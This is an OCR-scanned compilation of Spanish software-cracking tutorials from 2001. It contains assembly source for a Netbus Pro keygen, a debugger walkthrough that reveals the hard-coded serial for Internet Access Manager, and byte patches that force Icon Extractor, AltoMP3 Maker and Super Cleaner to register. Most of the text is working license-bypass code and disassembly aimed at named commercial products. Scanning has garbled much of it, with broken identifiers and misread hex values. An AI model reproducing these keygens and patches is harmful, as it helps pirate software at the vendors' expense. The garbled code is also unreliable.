FILE *Fileln, *FileOut; 

char Namel n[12], NameQut[ 12]; 
char Insert[] = "h,"; 

short Num; 

int Counter = 0, Cols; 


printf("Reconstructor v1.0 CoDeD bY Mr, Burns CoPYaLL 2001 01n"); 
printf("nFichero de entrada: "); 

fflush(stdin); 

gets(Namel n); 

printf("Fichero de salida: "); 

fflush(stdin); 

gets(NameQut); 


if((Fileln = fopen(Namel n, "r")) == NULL) 


printf('"|neRRoR - No se puede abrir %sin", Namel n); 
exit(1); 
J 


if((FileOut = fopen(NameQut, "w')) == NULL) 


1 

printf('"|neRRoR - No se puede abrir %sin", NameQut); 
exit(1); 

J 


while(!feof(Filel n)) 


1 

if((Counter % 10) == 0) 
fprintf(FileOut, 'ndb "); 
fread(SNum, 2, 1, Fileln); 
fprintf(FileOut, "0"); 
fwrite(SNum, 2, 1, FileOut); 
fwrite(|nsert, 3, 1, FileOut); 
Counter++; 


J 
printf('"ininoPeRaCioN FiNaLiZaDa CoN eXiTo1n"); 


fclose(Filel n); 
fclose(FileOut); 
J 


Despues de todo esto, aqui muestro el resultado de nuestro esfuerzo... un KeYgEn plagado de CaLLs por todos lados xDDDD 


NoTa: El keygen que vereis ahora no tiene la tabla necesaria (asi os lo currais un poquito ok?), tan solo la menciono. 


¡Netbus Pro v2.10 KeYgEn 
;CoDeR: Mr. Burns 
¡DaTe: 09-07-2001 


.MODEL TINY 
.CODE 
.386 


ORG 100h 


Start: jmp LetsRock 
¿AKI TENEMOS TODOS LOS DATOS... KE NO SON POCOS X-) 


Intro db 10, 13,'Netbus Pro v2.10 CoDeD bY Mr. Burns CoPYaLL 20010* 
db 10,13,'WeBSiTe: http://go.to/mr_burns' 
db 10,13,'e-MaiL: mr_burnsomyself.com' 
db 10,13 

db 10,13,'eNTeR YouR NaMe: $' 

Nombre0 db 32h,0 

Nombrel db 32h DUP(0) 

ScreenPass db 10,13,'YouR PaSSWORD is: ' 
PassOut1 db 08h DUP(0) 

db'oR' 

PassOut2 db 08h DUP(0) 

EndScreenPass db 10,13,'$' 

TempPass db 09h DUP(O) 

TempPassEnd db O 

Pass1 dd O 

Pass2 dd O 


MagicTable db 000h, O000h, O00h, O00h, O96h, 030h, 007h, 077h, 02Ch, O61h ;Tabla ke usaremos para generar el serial (tan 
solo teneis la 12 linea ;-)) 


MagicArray db 09h,24h, 31h, 31h, 36h, 41h,44h, 46h,41h, 34h 
db 00h,2Ah,2Ah,2Ah, 2Ah,2Ah, 2Ah,2Ah,2Ah, 2Ah 

db 2Ah,2Ah,2Ah,2Ah, 2Ah,2Ah, 2Ah,2Ah,2Ah, 2Ah 

db 2Ah,2Ah,2Ah,2Ah, 2Ah,2Ah, 2Ah, 2Ah,2Ah, 2Ah 

db 2Ah,2Ah,2Ah,2Ah, 2Ah,2Ah, 2Ah, 2Ah,2Ah, 2Ah 

db 2Ah,2Ah,2Ah,2Ah, 2Ah,2Ah, 2Ah, 2Ah,2Ah, 2Ah 

db 2Ah 

dl 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h 


MagicNuml db 09h,24h,32h, 30h, 31h, 41h,46h, 33h,44h,37h 
MagicNum2 db 08h,23h,31h,2Fh, 30h,40h,45h, 32h,43h, 36h 


¡AKI TENEMOS EL CODIGO... PLAGADITO DE "CALLs", KE LAS ECHABA DE MENOS 


LetsRock: 

mov ah,09h ;Sacamos por pantalla la intro 
lea edx,|ntro ;y pedimos el nombre 

int 21h 


mov ah,0Ah ;Recogemos el nombre 
lea edx, NombreO 
int 21h 


mov ah,byte ptr [Nombre0+01] ; Comprobamos ke haya introducido 
cmp ah,00 ;algun nombre 
jne InsertName ;Si es asi, saltamos 


mov ah,4Ch ;Sino, salimos del programa 
int 21h 


InsertName: 

lea esi,Nombrel ;ESI = £Nombrel 

lea edi, MagicArray ¡EDI = SMagicArray 

Call |nsert_Name ;|nsertamos el nombre en MagicArray 


lea esi,MagicNuml ;ESI = €MagicNuml 
lea edi, MagicArray ¡EDI = SMagicArray 
call |nsert_MagicNum ;|ntertamos el MagicNum1 en MagicArray 


lea edi, MagicArray ¡EDI = MagicArray 
Call Create_Serial ;Generamos el primer serial 


mov [Pass1],edx ;Lo guardamos en Passl 


lea esi,MagicNum2 ;ESI = €MagicNum2 
lea edi, MagicArray ¡EDI = SMagicArray 
call |nsert_MagicNum ;|nsertamos el MAgicNum2 en MagicArray 


lea edi, MagicArray ¡EDI = SMagicArray 
Call Create_Serial ;Generamos el 28 serial posible 


mov [Pass2],edx ;Lo guardamos en Pass2 


lea di,PassOutl1 ¿DI = SPassOutl 
mov eax,[Pass1] ; EAX = 18 Serial posible 
Call Hex_Convert ;Lo convertimos a hexadecimal 


lea di, PassOut2 ¿DI = GPassOut2 
mov eax,[Pass2] ; EAX = 28 Serial posible 
Call Hex_Convert ;Lo convertimos en hexadecimal 


mov ah,09h ;Sacamos por pantalla los dos Serials 
lea edx, ScreenPass 
int 21h 


mov ah,4Ch ; Salimos sin ningun error 
int 21h 


Insert_Name PROC 


mov ah,byte ptr [Nombre0+1] ¡AH = Longitud del nombre 
mov byte ptr [edi+0Ah],ah ;Lo insertamos en MagicArray 
movzx ecx, ah ;ECX = AH 

xor ebx,ebx ;EBX = 0 

add edi,OBh ¿EDI = €(MagicArray+11) 


Next_Car: 

mov ah, byte ptr [esi+ebx] ¡AH = Caracter del nombre 
mov byte ptr [edi+ebx],ah ;Lo insertamos en MagicArray 
inc ebx ¡Pasamos al siguiente caracter 

cmp ebx,ecx ; Hemos llegado al final? 

jne Next_Car ¿NO => Al bucle de nuevo! 


ret ¡Salimos de la CaLL 
ENDP ¡Terminamos el proceso 
Insert_MagicNum PROC 


xor ebx,ebx ;EBX = 0 
add edi,3Dh ¡EDI = 8(MagicArray+3Dh) 


Next_Num: 

mov ah,byte ptr [esi+ebx] ¡AH = Digito del MagicNumX 
mov byte ptr [edi+ebx],ah ;Lo insertamos en MAgicArray 
inc ebx ¡Siguiente digito 

cmp ebx,OAh ;Hemos terminado? 

jne Next_Num ;NO => Al bucle de nuevo 


ret ;Salimos de la CaLL 


ENDP 


Create_Serial PROC 


xor ecx,ecx ;ECX =0 

xor esi,esi ¡ES = ECX = 0 xDDD 
mov cl,47h ¡CL = 47h 

mov edx, OABCDEFh ;¡EDX = ABCDEFh 


Calculate: 

mov ebx,edx ;EBX = EDX 

shr ebx,08h ;Recogemos los 4 primeros 

and ebx,OOFFFFFFh ;"Filtramos" 

movzx esi,byte ptr [edi] ;ESI = Caracter de MagicArray 
xor edx,esi ; EDX = EDX XoR ESI 

and edx,O00000FFh ;Nos kedamos con los dos ultimos 
mov eax,04h ¡EAX = 4 

mul edx ;EAX (Parte alta) = EDX * EAX 

mov edx,eax ;¡EDX = EAX 

lea eax, MagicTable ¡EAX = €MagicTable 

add eax,edx ;EAX = 6(MagicTable+EDX) 

mov esi,dword ptr [eax] ;ESI = Doble palabra ke este en esa posicion 
mov edx,esi ;EDX = ESI 

xor ebx,edx ;EBX = EBX XoR EDX 

mov edx,ebx ¡EDX = EBX 

inc edi ¡Siguiente caracter 

dec cl ;Decrementamos CL 

jnz Calculate ;CL = 0? 

¿NO => Al bucle de nuevo!!! 

ret ¡Salimos de la CaLL 


ENDP 


Hex_Convert PROC ; Proceso para convertir en 

¡hexadecimal (ASCI!) los resultados 

lea esi, TempPassEnd-1 ;Y ke, sinceramente, paso de comentar 
mov edx, 4 


Loopy: 

xor ebx, ebx 
mov bl, al 
movzx ebx, bl 
and bl,OFh 
add bl, 30h 
cmp bl,39h 
jle Ok1 

add bl, 7 
mov byte ptr [esi],bl 
dec esi 

jmp Part2 


Ok: 
mov byte ptr [esi], bl 
dec esi 


Part2: 

mov bl, al 
movzx ebx, bl 
shr bl, 4 

add bl, 30h 
cmp bl, 39h 
jle Ok2 

add bl, 7 
mov byte ptr [esi],bl 
dec esi 

jmp Part3 


Ok2: 


mov byte ptr [esi], bl 
dec esi 


Part3: 

shr eax,8 
dec edx 
jnz Loopy 


ConvertDone: 
inc esi 


CopyNumber: 
movsb 

cmp byte ptr [esi],O 
jne CopyNumber 


ret 
ENDP 


end Start 
Despues de todo esto... puff!! que agusto nos hemos quedado ehhh!!! "Pos" nada mas que decir... 


E AGRADECIMIENTOS Y DESPEDIDAS - 


Despues de todo el tiempo que he dedicado a este tutorial imagino que me haya equivocado en algo, y espero que vosotros 
me enseñeis algo a mi mandandome los errores que haya cometido. Espero volver a verles en el proximo tutorial. 


Por ultimo queria saludar a todos los miembros de mi la K-FoR y decirles que siempre les recordare y que he ganado grandes 
amigos ahi dentro. 


Como siempre digo en mis tutoriales, si deseais contactar conmigo buscadme en: 


NICK SeRViDOR CaNaL 
Mr_Burns 
irc.irc-hispano.org FCRaCKeRS 
“EKiMuS” 


O por el contrario si tan solo deseas mandarme un e-mail: mr_burnst»myself. com 


http://go.to/mr_burns/ http: //mr_burns.go.to/ http: //mrburns. da.ru/ 
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2. W32dasm v 8.9 
3. Un Pelin de Conocimientos de Asm 


Profesor_X FECHA: 13/08/2001 


INTRODUCCION 


lo unico que buscamos es aprender mas sobre PROTECCIONES DE SOFTWARE , y asi tomar lo bueno y 
desechar lo malo y aplicarlo en nuestros propios programas para cuando nos toque estar en una empresa 
desarrolladora de software, podamos ofrecer un mejor producto, LO QUE SE MERECE EL CLIENTE "" 
CALIDAD Y EFICIENCIA """ en este mundillo del SHAREWARE, estas investigaciones para nosotros son solo 
profesionales, nunca con el afan de FREGAR a la compañia en cuestion, si no ponerle un punto de partida para que 
abran los ojos y digan HEY!!! QUE ESTOY HACIENDO MAL!!!! DEBO PONERME LAS PILAS Y HACER 


AL ATAKE 


| Comentario del Programa | 


Bueno chavales otro tuto mas en la lista .... ahora le toca el turno al programa llamado Internet 
Access Manager v 1.0 el cual desde este momento le llamaremos l aM, esta aplicación esta dirigida a 
algo en especial como lo es la cconfiguración de tus accesos telefonicos a internet o a otra 
computadora, asiendo el proceso lo mas facil posible para el usuario, tambien cuenta con un 
scheduler con el cual podras tener completo control de el tiempo de conexion que deseas, entre otra 
buenas opciones cuenta con una opcion de poder mostrar una estadistica con opcion de comparar 
dos estadisticas para tener una idea de cuanto tiempo y dinero estas gastando en tu conexion, 
tambien te mantiene en un estado pasivo la conexion cuando no etas usandola para prevenir una 
desconeccion por inactividad, a verdad es una buena utileria que merece estar dentro de tus 
aplicaciones de uso diario, pero porfavor comprenlo no sean gandallas...... lo que podemos decir 
sobre la proteccion es que es un poco burda ya que tratan de ponerla dificil, pero al final te das 
cuenta que es mucho mas facil de lo que imaginabas ya que dentro del programa ponen el serial 
correcto, y asi van comparando cada caracter que metes con el correcto, lo que se le llama 
hardcoded, ya veran por que lo digo. 


Manos a la Obra 


bueno amigos para empesar instalemos el laM y analizemoslo con la utileria File Inspector v 4.0 
para saber si esta empakada y en que lengueje esta hecho: 


(9 file msPEctor v4.2001 A El 


Signatura: 

<55 86 EC 83 C4 F4 53 69 EC 45 4A 00 ES A3 1C 
F6 FF 68 1D 7C 63 4A 00 68 94 4F 44 00 ES 17 
26 F6 FF 8B 15 30 63 44 00 89 02 68 9C 4F 44 > 


Versión de la DLL: — [2.1 L información... 


versión del SO: [t.o Versión de la imagen: [o.o 


Pulsa los rivales de > 
render GS abrrartivo... E Anales Gp sar 


como podemos ver esta hecho con Borland Delphi 3.0, mmm otra vez delphi.. jejjeje ....no esta 
empakado ni nada por el estilo.. ok continuemos ...ahora ejecutemos el programa para ver si acepta 
un serial y si al iniciar elprograma nos aparece una ventanita como esta : 


y Internet Access Manager 


Version 1.0 


April 9, 2001 
Author: Mas V. Vaslev 
Home: — Hitp://vwww softicidor com/igrew htrol 


[123456789 


mmm interesante .. jejejje ahora vamos y ponemos un numero de serie, que en mi caso pondre 
123467890 y damos click en el boton de OK y nos salta una ventanita como esta : 


19€) Sony, this registration code is invabd 


jejejeje mas de lo mismo, esto aprece una messagebox, lo primero seria desemsamblar el exe de el 
laM y buscar esa string, OK vayamos y desensamblemos, despues de un rato se termina de 
desemsamblar y vamos a buscar la string y cual es nuestra sorpresa que no hay nada de nada de 
SORRY, THE REGISTRATION BLA BLA BLA....se ve que estos programadores nos quieren hacer la 
vida de cuadritos, ok, 


Usando el Softl CE 


Encontrar un Serial Valido 


se acuerdan que la ventanita de error tiene un aspecto de messagebox, ok entonces vallamos y 
reiniciemos la PCERA con el Sice listo para funcionar, lo primero sera ejecutar el laM e ir a la 
ventana de insercion del serial y meter de nuevo algunos numeros, insertenlos y antes de dar ok , 
vamos y damos CONTROL D e insertamos un BPX MESSAGEBOXA, damos CONTROL D y regresamos 
a el laM ahora si damos click en el boton de OK! y saltamos directamente al SICE, damos una sola 
vez F12 y nos aparece la messagebox diciendonos que nuestro codigo es erroneo, damos click en 
OK! y saltamos otra vez a el SICE ahi damos F12 dos veces mas y caemos en la siguiente direccion 
de memoria: 


:0049C002 33C0 xor eax, eax 
una vez ahi vamos a subir unas cuantas lineas hasta llegar a esta parte del codigo: 


:0049BF7F ES64FEFFFF call 0O49BDES 
:0049BF84 84C0 test al, al 
:0049BF86 7462 je OO49BFEA 


como pueden ver aqui se encuentra una comparación y un salto condicional, esperen no vayan y 
cambien ese salto ya que si lo hacen solo haran que salga el mensaje de REGISTRATION CODE 
ACCEPTED, pero cuando reinicien el programa seguiran sin registrar, si se fijan hay una 
comparación y arribita una CALL que les parece si ponemos un breakpoint en la dirección de 
memoria 49BF7F y veamos lo que pasa ahi adentro....jejejejje.....insertemos un nuemrod e codigo 
falso como la primera vez y demos CONTROL D y pongamos BPX 49BF7F y despues damos control d 
y regresamos al programa y ahora si damos click en OK! y saltamos inmediatamente a esa dirección 


de memoria, en la cual caemos en la siguente parte del codigo de esa call y damos f10 hasta llegar 
a: 


:0049BEA4 8B06 mov eax, dword ptr [esi] 

:0049BEA6 E85181F6FF call 0O403FFC <--- esta call saca la longitud del codigo insertado y la 
devuelve en EAX 

:0049BEAB 83F80C cmp eax, 0000000C <---- compara la longitud obtenida den EAX con OCH que 
en decimal es 12 

:OO49BEAE 7C43 jl 0049BEF3 <------ Salta al mensaje de error si es menor a 12 el codigo de registro 
insertado 

:0049BEBO 8B06 mov eax, dword ptr [esi] <---- el acumulador EAX lleva nuestro codigo si es igual a 
12 


como podemos ver esto se pone mas interesante cada vez que avanzamos, 
jejejejeje........ CONTINUEMOS ..... 


:0049BEB2 803837 cmp byte ptr [eax], 37 <---- compara el primer caracter del codigo insertado con 37H que es 7 
:0049BEB5 753€ jne 0049BEF3 <---- salta si al mensaje de error si no es igual 

:0049BEB7 8B06 mov eax, dword ptr [esi] 

:0049BEB9 80780130 cmp byte ptr [eax+01], 30 <---- compara el segundo caracter del codigo insertado con 
30H que es O :0049BEBD 7534 ¡ne 0049BEF3 <---- salta si al mensaje de error si no es igual 
:0049BEBF 8B06 mov eax, dword ptr [esi] 

:0049BEC1 80780233 cmp byte ptr [eax+02], 33 <---- compara el tercer caracter del codigo insertado con 33H 
que es 3 

:0049BEC5 752C ¡ne 0049BEF3 <---- salta si al mensaje de error si no es igual 

:0049BEC7 8B06 mov eax, dword ptr [esi] 

:0049BEC9 80780330 cmp byte ptr [eax+03], 30 <---- compara el cuarto caracter del codigo insertado con 30H 
que es 0 :0049BECD 7524 ¡ne 0049BEF3 <---- salta si al mensaje de error si no es igual 

:0049BECF 8B06 mov eax, dword ptr [esi] 

:0049BED1 80780436 cmp byte ptr [eax+04], 36 <---- compara el quinto caracter del codigo insertado con 36H 
que es 6 :0049BED5 751€ ¡ne 0049BEF3 <---- salta si al mensaje de error si no es igual 

:0049BED7 8B06 mov eax, dword ptr [esi] 

:0049BED9 80780949 cmp byte ptr [eax+09], 49 <---- compara el decimo caracter del codigo insertado con 49H 
que es | 

:0049BEDD 7514 ¡ne 0049BEF3 <---- salta si al mensaje de error si no es igual 

:0049BEDF 8B06 mov eax, dword ptr [esi] 

:0049BEE1 80780443 cmp byte ptr [eax+0A], 43 <---- compara el onceavo caracter del codigo insertado con 
43H que es C 

:0049BEE5 750€ ¡ne 0049BEF3 <---- salta si al mensaje de error si no es igual 

:0049BEE7 8B06 mov eax, dword ptr [esi] 

:0049BEE9 80780B53 cmp byte ptr [eax+0B], 53 <---- compara el doceavo caracter del codigo insertado con 
53H que es S 

:0049BEED 7504 ¡ne 0049BEF3 <---- salta si al mensaje de error si no es igual 

:0049BEEF B301 mov bl, 01 

:0049BEF1 EBO7 ¡mp 0049BEFA 


bueno amigos aqui les traduje las instrucciones de como compara y genera el serial verdadero para 
lo acepte y ser usuario ""registrado"" entonces queda así: 


70306****| CS 


los asteriscos significan que del caracter 6 al 9 puedes poner cualquier numero, ya que el programa 
solo verifica los espacios del 1 al 5 y del 10 al 12, asi que ahora si probemos si sirve nuestra teoria 


Information 


1) Thank you for support | 


AHORA SI PODEMOS DECIR PROGRAMA CRACKEADO......... 


| Saludos | 


Saben que es lo mas gratificante en este medio de las investigaciones sobre protecciones que 
vulgarmente se le llama CRACKI NG aparte de obtener cada día mas y mas conocimientos y la 
satifación que se siente al poder con una protección, pues es la variedad de personalidades y 
amistades que uno va conociendo y haciendo con el tiempo, las cuales de alguna forma auque no 
las conoscas en persona o mucho menos en foto, les vas tomando aprecio, ya que éstas te van 
haciendo la vida mas facil y amena durante el tiempo que quieras permanecer en esto de el estudio 
de protecciones, asi vas entablando una amistad muy reconfortante conciertas personalidades de 
este medio, como les decia anteriormente conoce uno a muchas personas y quisiera aprovechar a 
mandar un saludo a mis mejores amigos, sin orden de preferencia , no espero romper algunas 
sencibilidades: 


Skuater : """" mi gran maestro """" 
Dek_OIN """"Estamos Locos ... jejejejjee....'""" 
Kuato Thor """" Compañero de mil batallas, don quijote y sancho panza ..... jejejje""""" 
ActMAgo """" Sigue asi.....""" 
Karpoff """"" El guru de las protecciones """"" 
Txeli """ COMPADRE Y AMIGO """" 
e Todo el DREAM TEAM de la Compilación de Tutoriales 2001 CdT2001 :) 


e Saludos a todos los crackers del mundo 


| Nota: | 


e Soy humano y cometo errores, si encuentras uno házmelo saber OK. 


e Si deseas bajar la última versión de la compilación puedes hacerlo de aquí: Compilación de Tutoriales v 


3.5 


e Si deseas aparecer en la compilación envía tu tutorial a: profesor_xGhotmail. com 


Espero que hayan disfrutado leyendo este tutorial y que les sirva para incrementar sus habilidades, pero 


recuerden, lean muchos tutoriales, practiquen, estudien y CRACKEAR será mucho más fácil. 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, 


Ingenieria Inversa y Programacion. 


Email 


"Colabora con tus Proyectos" 


sobre 


Karpoff Spanish Tutor 


Programa: Parches "inteligentes" :-) 


PROTECCION: Name / Serial. 

Objetivo: Registrarse con el serial correcto sin saber cual es :-) 
Dificultad: Principiante++. 

Herramientas: Softice, W32dasm, Editor Hexadecimal. 

CRACKER: CaoS ReptantE FECHA: 20/09/2001 


INTRODUCCION 


Este es, según se hagan las cuentas, mi tutorial número 13. Me temo que no es gran cosa pero se trata de 
romper la maldición y poder pasar al siguiente ;-) El sistema que propongo aquí es el de buscar una 
alternativa para esos programas (de los que - por suerte o por desgracia - cada vez hay menos) en los que la 
decisión entre chico bueno y chico malo se toma confrontando los dos seriales: el chungo, introducido por 
nosotros y el correcto, calculado por el programa. En este caso, lo más sencillo es hacer un parche, para 
que el programa acepte cualquier número. Aquí vamos a tratar de hacer que el programa se registre con el 
serial correcto, haciendo que el programa copie éste en el lugar donde está situado el serial chungo. ¿Que 
ventaja tiene el hacer esto cuando ya hemos encontrado el serial correcto? Una es que, si un colega quiere 
evaluar el programa sin prisas ;-) no es necesario que él lo tenga registrado a nuestro nombre, sino que lo 
puede tener registrado al suyo, sin que para ello tengamos que rastrear con el Softlce, buscándole su serial. 
Otra ventaja es que una vez registrados con el serial correcto, podemos substituir el programa parcheado 
por el programa original. Veremos unos ejemplos con unos cobayas que se prestan a esta manipulación, ya 
que este sistema, como os podéis suponer, no se puede aplicar a cualquier programa. A esto me refiero 
pues, al hablar de parches "inteligentes" ;-) 


AL ATAKE 


Programa: Icon Extractor 3.4 


Descripcion: Creo que el nombre es lo bastante explícito :) 


DOWNLOAD : http: //www.gregorybraun.com/1CONX32.ZTP 


Estos programas de Software by Design van bien para cuando se está deprimido, se crackea alguno de ellos y ya está :- 
D claro que ahora que ByTESCRACK ha hecho un keygen polivalente para todos sus programas, las cosas ya no serán 
como antes :-( De todos modos, como únicamente se trata de mostrar el funcionamiento del parche inteligente, este 
programa nos sirve. Ejecutamos el programa con el Softlce agazapado, vamos a Help/Register y le introducimos un 
serial chungo para intentar registrarnos. Antes de aceptar, ctrl+D para entrar en el Slce, introducimos un breakpoint, mi 
favorito: bpx hmemcpy, FS5 para salir de Slce y OK para registrarnos. Salta el Slce, le damos dos veces más a FS para 
que el programa lea las otras ventanas de texto y ocho o nueve veces a F12 hasta que aparecemos en: 


:0040DE61 5F pop edi 


A partir de aquí, debemos ver lo que hace el programa con nuestro serial chungo. Averiguaremos la posición o 
posiciones que ocupa en la memoria nuestro número, mediante la instrucción s 0 1 f£ffffff 'serial_chungo'. A 
continuación, empleando las instrucciones bpm dirección_obtenida r o bpr inicio_dirección_obtenida 
final_dirección obtenida r sabremos cuando el programa lee nuestro número para compararlo con el correcto. Vamos 
dándole a F5 para continuar cuando el Slce se detiene, pero al fin, vemos como en EAX y EBX se están formando 
unos números. Finalmente, en EBX aparece nuestro serial pasado a hexadecimal. Es conveniente utilizar como serial, 
un número que nos resulte fácilmente reconocible, tanto en formato decimal como hexadecimal. Ahora sólo falta llegar 
a la comparación de seriales, lo que ocurre aquí: 


:00407D98 3BD8 cmp ebx, eax 
:00407D9A 5F pop edi 
:00407D9B 741D je 00407DBA 
:00407D9D 68CFEAOO00O push O000EACF 
:00407DA2 6888130000 push 00001388 


Podemos comprobar que en EBX está nuestro serial chungo en hexadecimal, y en EAX, el serial correcto. Ahora 
vamos a parchear, pero no para que el programa acepte la comparación, sino que vamos a copiar el serial correcto en el 
lugar donde está nuestro serial chungo. Como la comparación en estas condiciones, resultará positiva, el código que 
hay a continuación del salto, no llegará a ejecutarse, por lo que podemos utilizarlo para nuestros siniestros propósitos :- 


) 


:00407D98 EB03 jmp 00407D9D 


:00407D9A 5F pop edi 
:00407D9B 741D je 00407DBA 


:00407D9D 8BD8 mov ebx, eax 
:00407D9F 3BD8 cmp ebx, eax 
:00407DA1 EBF7 jmp 00407D9A 


Si, ya sé que es una chapuza, pero funciona y hace posible que quedemos registrados con el número correcto, como 
podemos comprobar en el propio programa y en el registro (HKEY_USERS Y .DEFAULT Y Software | Software by 
Design Y Icon Extractor for Windows 95/NT | Registration). Ya tenemos uno, vamos a por el siguiente... 


Programa: AltoMP3 Maker 3.02 
Descripcion: Para pasar CDs de música a MP3 


DOWNLOAD : http://www.yuansoft .com/altom302.zip 


Aquí el procedimiento para llegar a la comparación de seriales, es muy parecido y no lo vamos a ver con detalle, 
bastará con decir que llegamos a la comparación entre seriales aquí: 


:0042A944 
:0042A946 
:0042A948 
:0042A94A 
:0042A94C 
:0042A94E 
:0042A950 
:0042A952 
:0042A955 
:0042A958 
:0042A95A 
:0042A95C 
:0042A95E 
:0042A961 
:0042A964 
:0042A966 


8A1l0 
8A1lE 
SACA 
3AD3 
751E 
84C9 
7416 
8A5001 
8A5E01 
SACA 
3AD3 
750E 
83C002 
83C602 
84C9 
75DC 


mov 
mov 
mov 


dl, byte ptr 
bl, byte ptr 
el; «al 

cmp dl, bl 

jne 0042A96C 

test el, el 

je 0042A968 

mov dl, byte ptr 
mov bl, byte ptr 
mov cl, dl 

cmp dl, bl 

jne 0042A96C 

add eax, 00000002 
add esi, 00000002 
test cl, cl 

jne 00424944 


[eax] 
[esi] 


[eax+01] 
[esi+01] 


Como en el caso anterior, modificaremos la rutina de comprobación para que se copien los bytes del serial correcto 
(dirección señalada por EAX) en el lugar de los del serial chungo (dirección indicada por ESD. 


:0042A944 
:0042A946 
:0042A948 
:0042A94A 
:0042A94C 
:0042A94E 
:0042A950 
:0042A952 
:0042A955 
:0042A958 
:0042A95A 
:0042A95C 
:0042A95E 
:0042A961 
:0042A964 
:0042A966 


8A1l0 
8816 
8ACA 
3AD2 
751E 
84C9 
7416 
g8A5001 
885601 
8ACA 
3AD2 
750E 
83C002 
83C602 
84C9 
75DC 


mov 
mov 
mov 


dl, byte ptr [eax] 
byte ptr [esil], dl 
cl, dl 
cmp dl, dl 
jne 0042A96C 
test. el, el 
je 0042A968 
mov dl, byte 
mov byte ptr 
mow cl, dal 
cmp dl, dl 
jne 0042A96C 
add eax, 00000002 
add esi, 00000002 
test cl, cl 

jne 00424944 


ptr [eax+01] 
[esi+01], dl 


Como en el caso anterior, quedaremos registrados con el serial correcto como podemos comprobar en el propio 
programa y en el archivo REGKEYCR.INI. De todos modos, lo más curioso de este programa es que tiene ¡23! rutinas 
iguales a esta. ¿Para que servirán? ¿Para despistar? No creo que sean tan zoquetes. Yo no he visto otro camino para 
registrarse que el que he seguido, pero si alguien descubre algo sobre esto, le agradecería me lo hiciera saber. Bueno ya 
tenemos dos, vamos a por el tercero... 


Programa: 


Descripcion: 


DOWNLOAD : 


Super Cleaner 2.21 Víctima cedida gentilmente por ByTESCRK ;-) 


Como su nombre indica, hace la limpieza. 


(del PC, claro) 


http: //www.southbaypc.com/download/cleansetup.exe 


En este caso es aún más sencillo encontrar el código de la comparación. El problema es que está en muy mal sitio, ya 
que se hace en KERNEL32... y no vamos a tocar ahí por razones obvias :-( Así que como conocemos el lugar donde 
sitúa el código correcto, vamos a pillar al programa cuando lo escribe, de nuevo mediante la instrucción bpr. Así 
localizamos el call que coloca el serial correcto en su sitio. 


:0040C59D E8AE000000 call 0040C650 

:0040C5A2 8B8C2414010000 mov ecx, dword ptr [esp+00000114] 
:0040C5A9 83C408 add esp, 00000008 

:0040C5AC 8D442404 lea eax, dword ptr [esp+04] 
:0040C5B0 50 push eax 

:0040C5B1 51 push ecx 


* Reference To: KERNEL32.1strcmpA, Ord:0329h 


:0040C5B2 FF15F8914100 Call dword ptr [004191F8] 


Como no tenemos espacio para colocar nuestro código vamos a buscar un espacio vacío al final de la sección y 
colocaremos una instrucción jmp para saltar a él. Sería más limpio poner un call, pero esto nos complicaría mucho la 
vida porque como podéis ver, todas estas instrucciones están relacionadas con la pila. Modificamos el código que 
quedará así: 


:0040C59D E8AE000000 call 0040C650 

:0040C5A2 8B8C2414010000 mov ecx, dword ptr [esp+00000114] 
:0040C5A9 83C408 add esp, 00000008 

:0040C5AC E91BCAOODO jmp 00418FCC 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :00418FE3 (U) 


:0040C5B1 51 push ecx 


* Reference To: KERNEL32.1strcmpA, Ord:0329h 


:0040C5B2 FF15F8914100 Call dword ptr [004191F8] 


Como he dicho antes, colocaremos nuestro parche en el final de la sección: 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :0040C5AC (U) 

:00418FCC 50 push eax 

:00418FCD 53 push ebx 

:00418FCE 51 push ecx 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :00418FD9 (U) 

| 
:00418FCF 8A18 mov bl, byte ptr [eax] 
:00418FD1 8819 mov byte ptr [ecx], bl 
:00418FD3 OADB or bl, bl 

:00418FD5 7404 je 00418FDB 

:00418FD7 40 inc eax 

:00418FD8 41 inc ecx 

:00418FD9 EBF4 jmp 00418FCF 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :00418FD5 (C) 

| 

:00418FDB 59 pop ecx 

:00418FDC 5B pop ebx 

:00418FDD 58 pop eax 

:00418FDE 8D442404 lea eax, dword ptr [esp+04] 

:00418FE2 50 push eax 


:00418FE3 E9C935FFFF jmp 0040C5B1 


Creo que está claro el funcionamiento. En todo caso diré que los push y pop son para que los valores de los registros 
sean los mismos al volver al código "normal" (hay que tener cuidado del orden en que se ponen) y que las dos 
últimas instrucciones antes del jmp de regreso son las que nos hemos "comido" para poner el jmp que nos ha traído 
aquí. El programa así parcheado, nos registra con el serial correcto (ver en el registro: HKEY_CURRENT_USERA 
Software 1 SuperCleaner | Registration) por lo que, una vez registrados, podemos deshacernos de él. Haced que 
parezca un accidente :-D 


¿Cuál es la manera más sencilla de ensamblar este código? Para mí, lo más fácil es hacerlo con el Softlce, colocando 
un bpx a la dirección de la primera instrucción a ensamblar (en este último caso: bpx 40c5ac), e introduciendo a 
continuación, la instrucción o instrucciones correspondientes (¡mp 00418FCC), finalizando con <esc> o un doble 
<return>. Luego se busca el siguiente código a ensamblar mediante F10, y se repite la operación. Esto tiene dos 
ventajas: la primera es que el Slce se encarga de codificar las instrucciones, calculando además la distancia relativa 
de los saltos, algo engorroso de hacer a mano (aparte de que es fácil equivocarse); la segunda es que, traceando con 
F10 las instrucciones que hemos ensamblado, podemos ver su ejecución paso a paso y detectar fácilmente los 
posibles errores (se trata de utilizar el Soflce como debugger que era su utilidad original, antes de que unos 
individuos sin escrúpulos ;-) se dedicaran a crackear programas con él). Como no hay rosa sin espinas, hay también 
un inconveniente: los cambios efectuados con el Softlce, se hacen en la memoria, por lo que hay que tomar nota de 
los códigos de las instrucciones para pasarlos al programa mediante un editor hexadecimal. Os recuerdo que la 
dirección que se le ha de indicar al editor es el offset, el cual se puede ver en la línea inferior del W32dsam, junto a 
la dirección de la instrucción sobre la que estamos. 


Podréis pensar que es mucho código para tan poco programa, pero en este tuto he tratado únicamente de buscar una 
alternativa para cierto tipo de programas a los que se puede dar un "tratamiento" distinto del habitual. Además estos 
trapicheos nos darán algo de práctica, que nos valdrá para empresas más ambiciosas. 


Para elaborar los parches podéis fabricaros un parcheador o utilizar alguno de los existentes. Yo utilizo el 
ScAEvoLa's PatchEngine. 


